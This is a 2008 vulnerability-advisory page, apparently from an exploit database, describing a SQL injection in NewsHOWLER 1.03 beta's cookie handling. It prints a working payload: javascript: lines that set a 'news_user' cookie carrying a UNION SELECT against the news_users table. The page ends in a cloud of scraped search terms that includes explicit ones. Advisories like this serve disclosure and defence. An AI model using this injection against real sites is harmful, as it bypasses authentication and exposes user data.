about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive Talk

exploits , vulnerabilities , articles , NewsHOWLER Cookie Data SQL Injection Vulnerability


Title NewsHOWLER Cookie Data SQL Injection Vulnerability
Published 2008-08-18-12:00AM
Updated 2008-08-27-08:14PM
Class Input Validation Error
CVE  
Remote  Yes
Local  No
Credit  IRCRASH (R3d.W0rm (Sina Yazdanmehr))
Vulnerable  Net Dupe NewsHOWLER 1.03 beta
Not Vulnerable  
Code  Attackers can use a browser to exploit this issue.The following exploit is available:javascript:document.cookie = "news_user=zz'+union+select+3,3,3,3+from+news_users/*; path=/";
javascript:document.cookie = "news_password=3; path=/";
TXT  t3xt 1t!


Advertising

Copyright 2007, SecurityDot
Sun, 23 Nov 2008 09:40:33 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
News Searc exploit 21 news for c LIVECRIKET www mambo Remo t167t mariazawa yaprak dok Free onlin XXXSexvedi mambo Remo news for C soyagam jran sex.c www.trish Usa 200 /compo xyz Katrenakai mambo Remo evil_scri www.saniya 5222 Mobile sex 22096 php includ Www.waters iis/ karchisex. www.banglo yahoo xss ubersoldie all cartoo asiea t532t www.woldse preeti zin painkiller www.woldse Www.Indian PHP remote yourporn www.sexi v com_phpsho all cartoo Nudeladies mambo Remo PUSSY mambo Remo